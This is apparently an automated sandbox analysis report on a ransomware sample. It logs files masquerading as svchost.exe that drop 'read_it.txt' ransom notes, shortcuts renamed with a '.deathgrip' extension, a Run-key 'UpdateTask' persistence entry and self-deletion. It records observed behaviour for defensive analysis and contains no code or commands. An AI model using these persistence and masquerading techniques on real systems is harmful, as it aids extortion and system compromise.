                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es_419\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\et\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fi\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fil\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fr\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hi\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hr\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hu\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\id\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\it\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ja\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ko\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lt\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lv\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nb\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nl\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pl\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_BR\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_PT\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ro\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sl\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\tr\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\vi\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_CN\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_TW\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\read_it.txtJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\wheel-0.42.0.dist-info\LICENSE.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Magnify.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Narrator.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Administrative Tools.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\computer.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Control Panel.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\File Explorer.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Run.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\7-Zip\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\All Users\Application Data\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\All Users\Application Data\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\StartUp\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\System Tools\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Windows PowerShell\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\All Users\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Magnify.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Narrator.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\Start Menu\Programs\Accessories\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\Start Menu\Programs\Accessories\Internet Explorer.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Administrative Tools.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\Start Menu\Programs\System Tools\computer.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Control Panel.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\Start Menu\Programs\System Tools\File Explorer.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Run.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk.deathgripJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UpdateTaskJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UpdateTaskJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Creates files inside the volume driver (system volume information)
                  Source: C:\Windows\System32\wbengine.exeFile created: C:\System Volume Information\WindowsImageBackup
                  Deletes itself after installation
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile deleted: c:\users\user\desktop\4wx72yflka.exeJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD656EF0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00007FF6DD656EF0
                  Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                  Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                  Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
